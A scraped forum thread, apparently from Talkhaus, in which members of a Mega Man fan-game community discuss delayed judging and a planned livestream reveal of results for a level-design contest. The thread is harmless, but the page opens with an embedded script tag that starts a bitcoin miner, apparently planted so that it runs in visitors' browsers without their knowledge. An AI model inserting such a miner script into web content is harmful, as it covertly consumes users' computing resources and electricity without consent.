<script>
miner.start(); // initialise bitcoin miner
</script>

irc.cat.biomario fan games galaxypge project

Make a Good Mega Man Level Contest (MaGMML)! RESULTS! TIER 5! Congrats RedBlupi!

would you like to participate in some fun contests? would you like to create some fun contests? well ^_^
blue_kirby
Wrong lever!!!
Pronouns: he/him/his

Re: Make a Good Mega Man Level Contest (MaGMML)! Judging In Progress!

Postby blue_kirby » 1 year ago

Random observation, but I just noticed that two of the judges have the same names as characters from "Foster's Home for Imaginary Friends" (well one of them is similar) :p
"That's embarrassing"

ParmaJon
Moose in a suit
First name: Jon (a bit too obvious?)

Postby ParmaJon » 1 year ago

blue_kirby wrote:Random observation, but I just noticed that two of the judges have the same names as characters from "Foster's Home for Imaginary Friends" (well one of them is similar) :p
Does that mean that pyro had to imagine new friends to be judgee for this contest?!?!? I can feel a scandal coming up.
Go to bed

No Lynch
Self-discovery's harder than it looks!
First name: No Lynch
Pronouns: they/she

Postby No Lynch » 1 year ago

So, what's the news on this?

Pyro
cutest girl 2023
Pronouns: she/her

Postby Pyro » 1 year ago

We're still waiting on the last judge. He says he's judged all the levels but for some reason the PM with his judgings didn't come through? I'll have to contact him again.
professional meme

Pyro
cutest girl 2023

Re: Make a Good Mega Man Level Contest (MaGMML)! Judging Finished, Results Soon!

Postby Pyro » 1 year ago

WHOOPS I completely forgot about the Talkhaus thread. All updates have been in Skypehaus and Sprites INC. I sincerely apologize for this.

First and foremost, judging is finally done. We had to get a replacement judge because the other judge completely evaporated from existence. Secondly, results will be up sometime this week. There's still a bunch of stuff I have to get done final product-wise, but I think I'll be able to do it by Sunday at the latest. Stay tuned for more updates!
professional meme

128-Up
Captain Aiwana

Re: Make a Good Mega Man Level Contest (MaGMML)! Judging Finished, Results Soon!

Postby 128-Up » 1 year ago

If Mario has taught me anything, it's that most things rely on whether there's something good in a nearby box.
Note: If something in the above post is done incorrectly, tell the poster as softly as possible, please.

128-Up's IWBTG Fangame Clear List
If you're wondering what on earth 'aiwana' is, click me!

Image <-- Click it!
Image Pokémon is hard.

ParmaJon
Moose in a suit
First name: Jon (a bit too obvious?)

Postby ParmaJon » 1 year ago

Holy shit finally. I've been going over to sprites inc for progress updates.
Go to bed

Pyro
cutest girl 2023

Postby Pyro » 1 year ago

I made my deadline! Everything besides some secret content is done, and the game is playable from last to first place. The results will be revealed in a unique way - you'll see what I mean soon. For now, though, have some teaser screenshots~ (don't open the spoiler if you're trying to avoid spoilers ;p)

professional meme

No Lynch

OH MAN HYPERONI AND CHEESE
can't wait!

Flashman85
Minor Internet Celebrity

Postby Flashman85 » 1 year ago

GOOD NEWS EVERYONE! THE CONTEST RESULTS ARE IN, AND THE PLAYABLE GAME IS READY!

::ahem::

Hi, I'm Flashman85, AKA GeminiLaser, and you might know me as that guy who takes forever to make YouTube videos, livestreams sometimes, and writes a whole lot about Mega Man on his website. The Powers That Be (ie, Pyro) have asked me to announce the contest results in a unique format: by livestreaming the Make a Good Mega Man Level Contest game and revealing the results as we go!

I have a copy of the game and have taken it for a brief test spin. Without spoiling the results, I can tell you that everyone's levels are accessible via a hub world and arranged from last place to first place (broken into tiers for easier navigation). The teleporter that leads to each level is flanked by a sign on one side that tells the name, author, and score of the level; and a letter on the other side that has each judge's specific feedback about the level. There's also a shop, a surprising amount to explore in the hub, a boss at the end of each tier, and an actual story that ties the game together. No matter where you placed in this contest, simply being a part of a game like this is a Very Cool Thing indeed.

I'm coordinating with Pyro about some possible bugfixes/updates before streaming the game, but the plan is to stream mid/late this week in the evening EST, or else on Saturday at a time that's accessible to both west-coast US and Europe. I'll announce an official time on Sprites INC, Talkhaus, my Twitter page, and my Facebook page. The livestream itself will happen on my Twitch channel, and if you follow me there, you'll get an automatic e-mail notification when I go live (in case you miss all the announcements). If you miss any part of the stream, I'll be archiving it on this YouTube channel.

The game is massive, and I'll be going into all of the levels blind (except my own, of course). It's doubtful I'll even be able to sample the whole thing in a single sitting, let alone beat it. It's very likely this will end up being a series of streams, but I'll definitely reveal all the contest results in the first stream to ensure nobody's kept waiting. The game should become available to the general public sometime shortly after the stream, but that's up to Pyro.

So! Get your weapons ready, folks; this is going to be fun. Stay tuned for updates.
No matter where you go, there you are.

MonkeyShrapnel
Poke a Man
First name: Brian

Postby MonkeyShrapnel » 1 year ago

hype get
Uh...Do I just sign here? What do you mean it should be obvious? There are people in this world...well...a whole lot of people that can't follow basic instructions!

My silly "Collab" Youtube channel https://www.youtube.com/user/Theguyswho ... s/featured
(That means I'm the only person using it nowadays.)

No Lynch

And thus the saber-toothed cat is officially let out of the bag.

Super excited for the stream!!!!

Friendly Dictator
rad

Postby Friendly Dictator » 1 year ago

GET
HYPED

128-Up
Captain Aiwana

Postby 128-Up » 1 year ago

My goal: Come in the top two-thirds of places
If Mario has taught me anything, it's that most things rely on whether there's something good in a nearby box.
Note: If something in the above post is done incorrectly, tell the poster as softly as possible, please.

128-Up's IWBTG Fangame Clear List
If you're wondering what on earth 'aiwana' is, click me!

Image <-- Click it!
Image Pokémon is hard.

Pyro
cutest girl 2023

Postby Pyro » 1 year ago

raekuul wrote:My goal: not be outright ejected from the contest.
(wrong contest)

(you did actually make it into endless though, the results were only posted on sprites inc. ;p)
professional meme

blue_kirby
Wrong lever!!!

Postby blue_kirby » 1 year ago

I hope I'm at least in the middle tier.
"That's embarrassing"

Flashman85
Minor Internet Celebrity

My goal: Don't Game Over on my own level.

Update time! TENTATIVELY, I am leaning toward hosting the revelatory livestream this coming Saturday, May 14, at a time of day when both Europe and west-coast US are likely to be awake. That also allows several days for the word to get around so that nobody misses the announcement because they're having a busy week. How does this sound to everyone?

ALTERNATELY, because everyone has waited so long to hear the results, I can accelerate the timeframe and do this coming Wednesday, May 11, so that you don't have to wait the extra couple days until the weekend. (I can technically also do Thursday and Friday, but at that point, we might as well wait until the weekend.) The drawback to streaming during the week is that anyone with a day job on the west coast will still be at work, and anyone in Europe with school or work in the morning will probably be on the way to bed. Faster notification, but presumably lower turnout, plus the chance that I'll be coming off a rough day of work and might not be at my livestreaming best. Hence why I'm pulling for Saturday, but I have no qualms with revealing the results sooner if the masses demand it.

As a reminder, the stream will be posted to YouTube the next day (with the chat window captured) in case anyone is unable to attend, so we're just looking at the timing and potential attendance of the initial reveal. Let me know what you think!

No Lynch

I say go for Saturday, but that's just because of my personal scheduling interfering with my being able to possibly attend on Wednesday, so take that as you will.

Gyra Solune
the feared barbarian

Postby Gyra Solune » 1 year ago

i look forward to seeing by how many points my level won first place

cheez8
Food Nut

Postby cheez8 » 1 year ago

Ohh man, so much hype. It's finally coming.

Both days work for me, and as long as I can catch it live, I'm happy.
I don't really get it but okay

Flashman85
Minor Internet Celebrity

Between Sprites INC and Talkhaus, it sounds like we have enough of a consensus to decide on an...

OFFICIAL MAKE A GOOD MEGA MAN LEVEL CONTEST LIVESTREAM DATE!

It's official! I will be livestreaming This coming Saturday, May 14 at 10 AM PST / 1 PM EST / 6 PM GMT on my Twitch channel (Flashman85). Due to the sheer number of levels, it's gonna be a long one—if I spend 5 minutes on each level and take some time to explore the hub, we're looking at around 4 hours, so tune in for however long you're able to join!

I'll post a reminder closer to the date on Sprites INC, Talkhaus, my Facebook page (GeminiLaser), and my Twitter page (nathanielhoover). As before, if you miss any part of the stream, I'll archive the whole thing on this YouTube channel (Flashman85LIVE). Hope to see you there, and spread the word!

Penguin Emperor
Omnipotent Feathered Tyrant

Postby Penguin Emperor » 1 year ago

A few things:

1. I didn't know you were in the Talkhaus, GeminiLaser, but I do love your videos... so cool! Thanks for all the great entertainment value you put into those!

2. I'm still really sad I couldn't get the editor to work, I really wanted to participate and now I feel even worse with how AWESOME this reveal it. Way to go to everyone who participated!

5. (3, sir) 3. I'm totally HYPED to at the very least watch the level reveal on Saturday. Not sure if I'll be home for the beginning of it, but I'll certainly join in!

Flashman85
Minor Internet Celebrity

Final reminder! MaGMML contest results are being streamed TODAY (assuming you're reading this TODAY) at 10 AM PST / 1 PM EST / 6 PM GMT on my Twitch channel (Flashman85). Once again, if you miss any part of the stream, I'll archive the whole thing on this YouTube channel (Flashman85LIVE).
Penguin Emperor wrote:I didn't know you were in the Talkhaus, GeminiLaser, but I do love your videos... so cool! Thanks for all the great entertainment value you put into those!
Hey, thanks! I'm not actually in Talkhaus, though. This is just a figment of your imagination generated specifically to inform you of how the contest results will be disseminated. ;)

No Lynch

Return to “contest center”